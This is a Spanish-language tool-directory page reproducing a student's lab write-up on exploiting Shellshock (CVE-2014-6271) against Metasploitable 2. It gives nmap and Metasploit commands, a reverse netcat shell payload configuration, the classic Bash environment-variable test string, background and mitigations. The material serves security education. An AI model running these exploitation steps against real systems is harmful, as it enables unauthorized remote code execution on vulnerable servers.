Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — Laboratorio educativo que demuestra la explotación de Shellshock (CVE-2014-6271) usando Metasploit contra Metasploitable 2, incluyendo escaneo, explotación, shell inversa y estrategias de mitigación. | Kitploit
Herramientas/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

Laboratorio educativo que demuestra la explotación de Shellshock (CVE-2014-6271) usando Metasploit contra Metasploitable 2, incluyendo escaneo, explotación, shell inversa y estrategias de mitigación.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🐚 Shellshock (CVE-2014-6271) – Explotación y Análisis

📌 Descripción general

Esta es la tarea práctica de Evaluación de Vulnerabilidades y Pruebas de Penetración – II, centrada en la explotación y análisis de la vulnerabilidad Shellshock (CVE-2014-6271).
Realizado en un entorno de laboratorio controlado usando Metasploitable 2 (objetivo) y Kali Linux (atacante).


🛠 Herramientas utilizadas

  • 💻 Kali Linux – Máquina atacante
  • 🖥 Metasploitable 2 – Objetivo vulnerable
  • 🔍 Nmap – Escaneo y detección de servicios
  • 🎯 Metasploit Framework – Explotación

🔍 Resumen de la vulnerabilidad

  • Tipo: Ejecución Remota de Código (RCE)
  • Componente afectado: GNU Bash (versiones 1.14–4.3)
  • Impacto: Ejecutar comandos arbitrarios a través de variables de entorno especialmente diseñadas
  • Puntuación CVSS: 10.0 (Crítico)
  • Vector de explotación: A menudo a través de cabeceras HTTP hacia scripts CGI

⚡ Pasos del laboratorio

1️⃣ Escanear objetivo

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ Iniciar Metasploit

msfconsole

3️⃣ Cargar módulo de explotación

use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ Configurar explotación

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ Ejecutar explotación

exploit

📸 La demostración incluye

root@kitploit:~
📡 Resultados del escaneo Nmap

⚙️ Configuración de Metasploit

🔄 Salida de sesión de shell inversa

🛠 Comandos de post-explotación:

whoami
uname -a
ifconfig

📖 Antecedentes teóricos

¿Qué es Shellshock?

Shellshock es una vulnerabilidad en el intérprete de comandos GNU Bash que permite a los atacantes ejecutar comandos arbitrarios inyectándolos en variables de entorno. Descubierta en septiembre de 2014 y asignada como CVE-2014-6271, afecta a Bash v1.14 a v4.3.

Cómo funciona

Bash procesa incorrectamente las definiciones de funciones en variables de entorno y ejecuta comandos adicionales después del cuerpo de la función. En servidores web que usan scripts CGI, las cabeceras HTTP se convierten en variables de entorno, creando un camino de ataque fácil.

Ejemplo:

env x='() { :;}; echo vulnerable' bash -c "echo test"

Si es vulnerable, imprime vulnerable.

Impacto

  • Ejecución Remota de Código (RCE) completa sin autenticación

  • Explotable a través de simples peticiones HTTP

  • Usado en botnets, gusanos, ataques dirigidos

  • Afectó a millones de servidores, enrutadores y dispositivos IoT

Exploits en el mundo real

  • Servidores de Yahoo – Malware a través de scripts CGI

  • Botnet Wopbot – Explotación automatizada

  • NAS QNAP – Acceso remoto a shell y malware

  • Gusanos autorreplicantes – Propagación a nuevos hosts vulnerables

🛡 Prevención y mitigación

  • 🔄 Actualizar Bash inmediatamente

  • 🚫 Deshabilitar scripts CGI no utilizados

  • 🔥 Usar cortafuegos para bloquear tráfico innecesario

  • 🛡 Implementar Cortafuegos de Aplicaciones Web (WAF)

  • 📜 Monitorear registros de peticiones HTTP

  • 👤 Aplicar principios de mínimo privilegio

⚠️ Aviso legal

Este proyecto es solo con fines educativos. Todas las pruebas se realizaron en un entorno de laboratorio controlado. ❌ NO utilice estas técnicas en sistemas sin permiso.

👨‍💻 Autor: Janith Madhusankha 🎓 Curso: BICT (Hons) en Redes y Seguridad 🏫 Institución: South Eastern University of Sri Lanka

Descargar herramienta